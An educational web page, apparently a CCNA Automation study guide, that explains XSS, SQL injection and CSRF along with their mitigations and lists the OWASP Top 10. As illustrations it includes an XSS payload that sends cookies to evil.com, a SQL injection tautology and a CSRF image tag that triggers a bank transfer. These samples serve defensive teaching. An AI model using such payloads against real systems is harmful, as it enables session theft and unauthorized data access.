Skip to main content
PacketMentor logo
Open menu
← All topics
Automation & Programmability Foundational

OWASP Top Threats for Network Engineers

The three OWASP threats called out in CCNAAUTO 200-901 4.10: XSS (code injected into pages), SQLi (code injected into database queries), CSRF (tricking a user's browser into making a request). Plain English with examples.

Quick summary
  • XSS = attacker gets their JavaScript to run in another user's browser. Mitigation: escape output; set Content-Security-Policy.
  • SQL injection = attacker gets their SQL to run on your database. Mitigation: parameterized queries. Never concatenate strings into SQL.
  • CSRF = attacker tricks a logged-in user's browser into submitting a request to your site. Mitigation: anti-CSRF tokens; SameSite cookies.

Mental model

OWASP (Open Web Application Security Project) publishes the Top 10 list of common web app security risks. Cisco objective 4.10 calls out three specifically: XSS, SQL injection, CSRF. These are classic attacks every developer must know.

XSS (Cross-Site Scripting)

Attack: The app displays user-supplied text without escaping it, so attacker-supplied text containing <script>...</script> runs in another user’s browser.

Example

A help-desk ticket form stores the user’s name and shows it on every subsequent page:

Hello, <%= user.name %>

Attacker signs up with name <script>fetch('https://evil.com/steal?c='+document.cookie)</script>.

Any admin who opens the ticket runs that script in their browser, under the app’s domain. The attacker gets the admin’s session cookie.

Mitigation

  • Escape output. Modern frameworks (React, Vue, Django templates, Jinja2) escape by default. Avoid dangerouslySetInnerHTML / |safe.
  • Content-Security-Policy header: tells the browser not to execute scripts from arbitrary sources.
  • HttpOnly cookies so JavaScript cannot read session cookies even if XSS fires.

SQL injection (SQLi)

Attack: The app builds a SQL query by concatenating strings. User input ends up inside the query, changing its meaning.

Example (bad)

cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")

Attacker enters admin' OR '1'='1. Resulting query:

SELECT * FROM users WHERE name = 'admin' OR '1'='1'

That returns every user.

Mitigation

  • Parameterized queries (also called prepared statements). The DB engine knows which bits are code and which are data.
# Python with sqlite3 / psycopg2 / mysql-connector
cursor.execute("SELECT * FROM users WHERE name = %s", (name,))
  • ORMs (SQLAlchemy, Django ORM) parameterize automatically. Prefer them over raw SQL.
  • Minimum privilege: the app’s DB user should not be able to drop tables.

CSRF (Cross-Site Request Forgery)

Attack: User is logged into Site A (your bank) in one tab. User visits Site B (attacker’s) in another tab. Site B embeds <img src="https://bank.example.com/transfer?to=attacker&amount=1000">. The user’s browser attaches the bank’s cookies and the transfer goes through.

Mitigation

  • Anti-CSRF tokens. Server sends a one-time token with every form; attacker cannot know the token in advance.
  • SameSite cookies. Set Set-Cookie: ...; SameSite=Lax (default in modern browsers). Cookies are not sent on cross-site requests.
  • Prefer POST for state-changing operations (CSRF against POST is harder than GET).
  • Modern frameworks (Django, Rails, Spring Security) ship with CSRF middleware on by default.

The three in one table

ThreatRoot causeMitigation
XSSRendering untrusted text as HTML / JSEscape on output, CSP, HttpOnly cookies
SQL injectionConcatenating strings into SQLParameterized queries / ORMs
CSRFBrowser attaches cookies to any request to the cookie’s domainCSRF tokens, SameSite cookies

The wider OWASP Top 10 (good career knowledge)

Current OWASP Top 10 (A01 to A10):

CodeRisk
A01Broken Access Control
A02Cryptographic Failures
A03Injection (includes SQLi, XSS)
A04Insecure Design
A05Security Misconfiguration
A06Vulnerable and Outdated Components
A07Identification and Authentication Failures
A08Software and Data Integrity Failures
A09Security Logging and Monitoring Failures
A10Server-Side Request Forgery (SSRF)

For the exam, know the three Cisco calls out (XSS, SQLi, CSRF). The rest are useful background.

FAQ

Does XSS matter if my app only serves logged-in employees? Yes. The impact is often worse — stealing an admin’s session is more valuable than a random user’s.

Can an ORM get me SQL injection? Not if used properly. Trouble starts when you drop to raw() or build strings with user input and pass them to text().

Is CSRF relevant for API-only backends? Less so. APIs usually use token auth in a header (not cookie), so a cross-site browser request cannot attach credentials. Still, consider double-submit tokens or Origin header validation.

Where do I learn more? owasp.org has free cheat sheets for every risk. For hands-on practice, OWASP Juice Shop is a deliberately broken app you can attack safely in a Docker container.

Master this on a real network

Want this drilled into reflex?

1:1 weekly sessions, live feedback on your labs, and US interview prep: built around the CCNA Automation® exam blueprint. Free first session. No card on file until you decide.

Claim my free session →

Get the free CCNA 12-week roadmap

You're already reading up on OWASP Top Threats for Network Engineers. The roadmap is the order I recommend studying every CCNA topic in: with what to lab each week and where OWASP Top Threats for Network Engineers fits. A written personal reply, not an autoresponder. Expect it within one business day.

Personal reply from a senior network engineer. No third-party tracking. Unsubscribe any time.